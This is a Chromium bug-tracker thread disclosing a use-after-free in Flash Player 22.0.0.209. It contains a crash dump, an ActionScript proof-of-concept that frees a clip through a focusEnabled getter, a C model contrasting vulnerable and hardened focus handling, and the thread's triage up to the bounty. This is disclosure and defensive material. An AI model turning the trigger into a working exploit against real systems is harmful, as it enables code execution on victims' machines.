Security: use-after-free vulnerability in flash player 22.0.0.209
Reported by
jiezengo...@gmail.com,
Jul 22 2016
Issue description

VULNERABILITY DETAILS
There is a use-after-free vulnerability in Flash Player, which could lead to code execution.

VERSION
Flash Player 22.0.0.209 in Chrome on Windows 7 x86 (other platforms should trigger it also).

Please drag the test.swf into Chrome; it will crash. Please do not publish this in MAPP; publish it in the Chrome issue list 14 weeks after it is marked as Fixed. Credit is to "JieZeng of Tencent Zhanlu Lab". Please report it as soon as possible.

Chrome crash state:

5b6583f1 e88a830500     call    pepflashplayer!PPP_ShutdownBroker+0x1bf58d (5b6b0780)
5b6583f6 84c0           test    al,al
5b6583f8 0f8502010000   jne     pepflashplayer!PPP_ShutdownBroker+0x16730d (5b658500)
5b6583fe 8b450c         mov     eax,dword ptr [ebp+0Ch]
5b658401 8b581c         mov     ebx,dword ptr [eax+1Ch]
5b658404 83bbfc00000002 cmp     dword ptr [ebx+0FCh],2  ds:0023:000000fc=????????
3:037> r
eax=0250a1a0 ebx=00000000 ecx=00000000 edx=02706000 esi=00000000 edi=0250a1a0
eip=5b658404 esp=0024d240 ebp=0024d450 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
pepflashplayer!PPP_ShutdownBroker+0x167211:
5b658404 83bbfc00000002 cmp     dword ptr [ebx+0FCh],2  ds:0023:000000fc=????????
3:037> dd eax
0250a1a0  0250a560 00000000 00000000 00000000
0250a1b0  00000000 00000000 00000000 00000000
0250a1c0  00000000 00000000 00000000 00000000
0250a1d0  00000000 00000000 00000000 00000000
0250a1e0  00000000 00000000 00000000 00000000
Jul 23 2016
Thanks for reporting this! I'll report it to Adobe shortly.
Adding an approximate ActionScript PoC for this issue, since one wasn't included in the bug:
// Build a parent clip m with a child clip subm.
var m = this.createEmptyMovieClip("m", 1, 1, 2, 3, 4);
var subm = m.createEmptyMovieClip("subm", 2, 1, 2, 3, 4);
// Getter/setter for focusEnabled: removing m also destroys subm
// while the player is still in the middle of the focus change.
function f(){
    m.removeMovieClip();
    return false;
}
subm.addProperty("focusEnabled", f, f);
// Setting focus on subm makes the player read focusEnabled,
// which runs f() and frees the clip being focused.
Selection.setFocus("subm");
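The PoC above works because the player runs script (the focusEnabled getter) in the middle of its own focus handling and then keeps using the clip that the script just removed. The following C model of that re-entrancy pattern is an added example, not code from the bug report or from Flash Player: the names (Clip, set_focus_vulnerable, set_focus_hardened, remove_clip), the one-child display list and the tiny checked allocator are all assumptions made for the model. The allocator zeroes a freed slot, which matches the crash dump (the pointer loaded from the freed object was 0), and every engine-side dereference goes through deref() so a stale read is counted instead of crashing the example.

```c
/* Added example: C model of the getter re-entrancy behind the PoC.
 * Names and the allocator are assumptions, not Flash Player internals. */
#include <stdio.h>
#include <string.h>

#define POOL_SIZE 8

typedef struct Clip Clip;
typedef int (*Getter)(Clip *self);      /* script getter for focusEnabled */

struct Clip {
    Clip   *parent;
    Clip   *child;          /* one child per clip is enough for the model */
    Getter  focus_getter;   /* NULL: built-in getter, always "enabled" */
    int     in_use;         /* allocator bookkeeping; 0 means freed */
    int     refs;           /* owners; the display list holds one */
    int     removed;        /* taken off the display list */
};

static Clip pool[POOL_SIZE];
static int  bad_reads;      /* reads of freed memory or of a pointer loaded from it */

static void scene_reset(void) { memset(pool, 0, sizeof pool); bad_reads = 0; }

static Clip *clip_alloc(Clip *parent) {
    for (int i = 0; i < POOL_SIZE; i++) {
        if (pool[i].in_use) continue;
        memset(&pool[i], 0, sizeof pool[i]);
        pool[i].in_use = 1;
        pool[i].refs = 1;               /* the display list's reference */
        pool[i].parent = parent;
        if (parent) parent->child = &pool[i];
        return &pool[i];
    }
    return NULL;
}

/* free(): the slot is zeroed, as the crash dump shows for the freed object. */
static void clip_release(Clip *c) { if (--c->refs == 0) memset(c, 0, sizeof *c); }

/* Stands in for the engine's mov/cmp on the object: a freed slot or a null
 * pointer loaded from one is counted rather than crashing the example. */
static Clip *deref(Clip *c) {
    if (c == NULL || !c->in_use) { bad_reads++; return NULL; }
    return c;
}

/* MovieClip.removeMovieClip(): children go first, then the clip itself. */
static void remove_clip(Clip *c) {
    if (c->child) remove_clip(c->child);
    if (c->parent) c->parent->child = NULL;
    c->parent = NULL;
    c->removed = 1;
    clip_release(c);
}

/* Script side of the PoC: the getter for subm.focusEnabled removes m,
 * which also tears down subm while the engine is still looking at it. */
static int evil_getter(Clip *self) { remove_clip(self->parent); return 0; }

static int call_getter(Clip *c) { return c->focus_getter ? c->focus_getter(c) : 1; }

enum { FOCUS_UAF = -1, FOCUS_REFUSED = 0, FOCUS_SET = 1 };

/* Vulnerable: runs script, then trusts that c and c->parent still exist. */
static int set_focus_vulnerable(Clip *c) {
    int enabled = call_getter(c);               /* re-entry point */
    Clip *p = deref(c) ? deref(c->parent) : NULL;
    if (p == NULL) return FOCUS_UAF;            /* the real player crashed here */
    return enabled ? FOCUS_SET : FOCUS_REFUSED;
}

/* Hardened: hold a reference across the script call so c cannot be freed
 * under us, then re-check that it is still on the display list. */
static int set_focus_hardened(Clip *c) {
    c->refs++;
    int enabled = call_getter(c);
    int attached = !c->removed && c->parent != NULL;
    clip_release(c);
    return (enabled && attached) ? FOCUS_SET : FOCUS_REFUSED;
}

/* Builds the PoC's display list root -> m -> subm with the getter installed
 * on subm, and returns subm. */
static Clip *build_scene(Getter g) {
    scene_reset();
    Clip *root = clip_alloc(NULL);
    Clip *m = clip_alloc(root);
    Clip *subm = clip_alloc(m);
    subm->focus_getter = g;
    return subm;
}

int main(void) {
    int r;
    r = set_focus_vulnerable(build_scene(NULL));
    printf("benign getter, vulnerable path: %d, bad reads %d\n", r, bad_reads);
    r = set_focus_vulnerable(build_scene(evil_getter));
    printf("PoC getter, vulnerable path:    %d, bad reads %d\n", r, bad_reads);
    r = set_focus_hardened(build_scene(evil_getter));
    printf("PoC getter, hardened path:      %d, bad reads %d\n", r, bad_reads);
    return 0;
}
```

The hardened routine shows the two halves of the usual fix for callback re-entrancy: keep the object alive across the script call (the extra reference), and treat everything observed before the call as stale afterwards (the attached check), since the script may have torn down any part of the display list.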
Jul 26 2016
What is the PSIRT number?
Jul 29 2016
@natashenka: I want to know whether this issue has a PSIRT number. And if this issue was submitted by others, please let me know as soon as possible. Thanks!
Jul 29 2016
Sorry to take so long to get back to you. This is PSIRT-5643, and I haven't heard from Adobe when it will be fixed yet. As far as I know, no one else has submitted this issue via the Chrome tracker. Otherwise, Adobe generally doesn't let people know whether issues submitted to them were duplicates until the issue is fixed.
Jul 30 2016
@natashenka That's OK! I got it.
Sep 22 2016
Hi, this was fixed in September; what is the next program?
Sep 22 2016
Marking this as fixed
Sep 26 2016
Your change meets the bar and is auto-approved for M54 (branch: 2840)
Sep 29 2016
This issue has been approved for a merge. Please merge the fix to any appropriate branches as soon as possible! If all merges have been completed, please remove any remaining Merge-Approved labels from this issue. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Oct 7 2016
Nothing to merge here.
Oct 16 2016
And $3,000 for this one!
Dec 30 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot